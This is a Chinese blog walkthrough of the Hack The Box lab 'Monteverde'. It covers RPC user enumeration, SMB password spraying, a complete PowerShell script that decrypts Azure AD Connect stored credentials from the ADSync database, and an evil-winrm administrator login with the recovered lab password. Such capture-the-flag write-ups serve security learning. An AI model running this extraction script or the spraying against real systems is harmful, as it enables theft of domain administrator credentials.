HTB-Monteverde

已于 2023-04-19 12:33:47 修改
阅读量202 收藏
点赞数
分类专栏: HTB 文章标签: 其他
于 2023-04-16 17:00:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37370714/article/details/130178872
版权

HTB-Monteverde

请添加图片描述

信息收集

在这里插入图片描述
在这里插入图片描述

smbclient

允许匿名登录,但是没有工作组。
在这里插入图片描述

5985端口

在这里插入图片描述
目录扫描,存在wsman,后续可能会涉及到winrm。

在这里插入图片描述

RPC

rpcclient -U "" -N 10.10.10.172

收集用户信息enumdomusers
在这里插入图片描述

querydispinfo

在这里插入图片描述

没有更多信息,试试对收集到的用户进行暴力破解。
在这里插入图片描述
在这里插入图片描述
使用SABatchJobs:SABatchJobs登录smb。
在这里插入图片描述

users$有几个文件。

在这里插入图片描述

要是遇到套娃的就难受了。
在这里插入图片描述

在这里插入图片描述
有smbmap可以帮到我们。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
对获得的用户以及4n0therD4y@n0th3r$来进行组合测试。

在这里插入图片描述

mhope

在这里插入图片描述
mhope用户目录下发现了.Azure。
在这里插入图片描述
许多与Azure有关的软件
在这里插入图片描述

在这里插入图片描述

Function Azure-ADConnect {param($db,$server)
$help = @"
.SYNOPSIS
    Azure-ADConnect
    PowerShell Function: Azure-ADConnect
    Author: Luis Vacas (CyberVaca)
    Based on: https://blog.xpnsec.com/azuread-connect-for-redteam/
    Required dependencies: None
    Optional dependencies: None
.DESCRIPTION
.EXAMPLE
    Azure-ADConnect -server 10.10.10.10 -db ADSync
    Description
    -----------
    Extract credentials from the Azure AD Connect service.
"@
if ($db -eq $null -or $server -eq $null) {$help} else {
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server = $server; Database = $db; Initial Catalog=$db; 
Integrated Security = True;"
$client.Open()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()

$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()

add-type -path "C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll"
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)

$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerXML}}

"[+] Domain:  " + $domain.Domain
"[+] Username: " + $username.Username
"[+]Password: " + $password.Password
}}

貌似没连接上数据库呢。
在这里插入图片描述
作出修改可以运行。

$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server = 127.0.0.1; Database = ADSync; Initial Catalog=ADSync; 
Integrated Security = True;"
$client.Open()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()

$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()

add-type -path "C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll"
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)

$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerXML}}

"[+] Domain:  " + $domain.Domain
"[+] Username: " + $username.Username
"[+]Password: " + $password.Password

在这里插入图片描述

evil-winrm -i target_Ip -u administrator -p d0m@in4dminyeah!
该账号已被注消
关注
专栏目录
htb-beep
m0_55772907的博客
09-15 952
一般
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
HTB打靶日记:Monteverde
m0_73998094的博客
12-27 660
HTB打靶日记:Monteverde
Hack The Box——Monteverde
江左盟的博客
06-20 660
目录 简介 信息收集 端口扫描与服务识别 枚举域信息 漏洞发现 暴力破解弱口令 漏洞利用 获得域用户密码 权限提升 总结 简介 该靶机又是一台简单的Windows Azure Active Directory域控主机。通过枚举域用户smb服务发现弱口令,进一步通过共享文件夹泄漏的域用户mhope的密码登录域控主机,接着利用Azure Admins组的权限查询SQLServer中存储的域管理员的密码,进而获得域管理员权限。 信息收集 端口扫描与服务识别 使用nmap 10.10.
No.188-HackTheBox-windows-Monteverde-Walkthrough渗透学习
qq_34801745的博客
08-19 308
** HackTheBox-windows-Monteverde-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/223 靶机难度:中级(4.3/10) 靶机发布日期:2020年3月23日 靶机描述: Monteverde is an easy Windows machine that features Azure AD Connect. The domain is enumerated and a user list
HTB-Bastion
2201_75378806的博客
05-15 965
它存储虚拟机(VM)硬盘的内容,其中可能包括磁盘分区,文件系统,文件和文件夹。它是 Libguestfs 项目的一部分,该项目提供用于访问和修改虚拟机 (VM) 磁盘映像的工具。SAM 文件是 Windows 安全基础结构的关键组件,用于系统上的本地身份验证。检查器是一个可以自动检测映像中有关操作系统和磁盘结构的信息的工具。然而,在备份中它们是可以访问的,因为它们没有“使用中”。:指定要访问的虚拟机磁盘映像的路径。在这种情况下,路径指向位于指定目录的VHD(虚拟硬盘)文件。:指定磁盘映像应以只读模式安装。
htb-Bounty
2201_75378806的博客
05-15 1973
端口扫描该网站本身只是提供了一个向导的图像merlin.jpgf12 抓包响应标头表明该站点由以下人员提供支持ASP.NETgobuster -u http://10.10.10.93 -w usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -o gobuster_root -x aspx爆破目录呈现一个带有“浏览...”和“上传”按钮的简单表单:上传一个图片看看aspx shell 的副本,并尝试上传它。
HTB-Timelapse
最新发布
2201_75378806的博客
05-18 954
您还可以使⽤Windows LAPS⾃动管理和备份Windows Server Active Directory域控制器上的⽬录服务还原模式(DSRM)账户密码。使⽤LAPS(Local Administrator Password Solution),域控制器可以管理域中计算机的本地管理员密。要读取LAPS(本地管理员密码解决⽅案)密码,只需要使⽤Get-ADComputer命令,并明确请求ms。通常会创建⼀个⽤户组,并赋予其读取这些密码的权限,从⽽允许可信管理员访问所有本地管理员。
HTB-Cronos
TA不懒,但还没有添加简介
12-06 586
HTB-Cronos
HTB-Jarvis
TA不懒,但还没有添加简介
04-16 467
HTB-Jarvis
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
HTB-Recon:Hackthebox计算机的自动侦查脚本(hackthebox.eu)
03-09
例如: ./htb-recon.sh 10.10.10.10. ServMon Windows ./htb-recon.sh 10.10.10.10. ServMon Windows 然后通过tmux a -t htb_recon附加会话 它能做什么 在您的主目录中创建一个工作区。 创建不同的文件夹以使事情...
HTB-Gen:脚本para gerar邀请de HackTheBox
03-29
HTB-Gen 脚本para gerar邀请de HackTheBox Windows / Linux Qualquer pessoa pode usar o script para fins lucrativos,para usar apenas tens abrir o teu Terminal / CMD dentro do diretorio do script depois...
QT属性动画--设置样式属性(其他属性)
lizequan的博客
03-02 6089
这里写自定义目录标题故事背景遇到的问题解决过程最终方法感悟 故事背景   最近在制作一个按钮切换的动画特效中接触了属性动画这部分内容,并由此产生了一些思考。 遇到的问题 解决过程 最终方法 感悟 ...
Volatile的其他特性
我想月薪过万的博客
03-03 4449
2.1 volatile总体概览 在上一节中,我们已经研究完了volatile可以实现并发下共享变量的可见性,volatile除了保证可见性外,volatile还具备如下一些突出的特性: volatile的原子性问题:volatile不能保证原子性操作 禁止指令重排序:volatile可以防止指令重排序操作 2.2 volatile不保证原子性 2.3 代码测试 package Ls; /** * 目标:研究Volatile的原子性操作 * <p> * 基本观点:V.
【安卓基础】Android直接通过路径来操作其他应用的私有目录,可以吗?
m0_48179608的博客
03-02 7802
在上篇文章[【安卓基础】一文搞懂Android历代版本文件访问权限变化](https://blog.csdn.net/m0_48179608/article/details/122838494)我们对同一个应用的的文件访问权限做了比较。 那么不同应用之间文件访问又有什么限制呢?我们准备分二到三篇文件来阐述。 这篇文章,主要来看下不同系统版本下,我们直接通过路径来访问其它应用的**内部存储、外部存储私有目录**,看看能不能访问以及不同系统版本的区别。
Silane-PEG-NHS,SIL-PEG-NHS,可以用来修饰蛋白质、多肽以及其他活性基团,NHS-PEG-Silane
qq_39152602的博客
03-03 4033
英文名称:Silane-PEG-NHS 中文名称:硅烷-聚乙二醇-活性酯 分子量:1k,2k,3.4k,5k,10k,20k(可按需定制) 质量控制:95%+ 存储条件:-20°C,避光,避湿 用 途:仅供科研实验使用,不用于诊治 外观: 固体或粘性液体,取决于分子量 注意事项:取用一定要干燥,避免频繁的溶解和冻干 溶解性:溶于大部分有机溶剂,如:DCM、DMF、DMSO、THF等等。在水中有很好的溶解性 取用:现配现用,将包装从冰箱中取出,置于干燥器中缓慢升至室温,打开瓶盖,取用。取用.
[Golang]力扣Leetcode—中级算法—其他—两整数之和(位运算)
皮埃尔的博客
03-03 3317
[Golang]力扣Leetcode—中级算法—其他—两整数之和(位运算)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值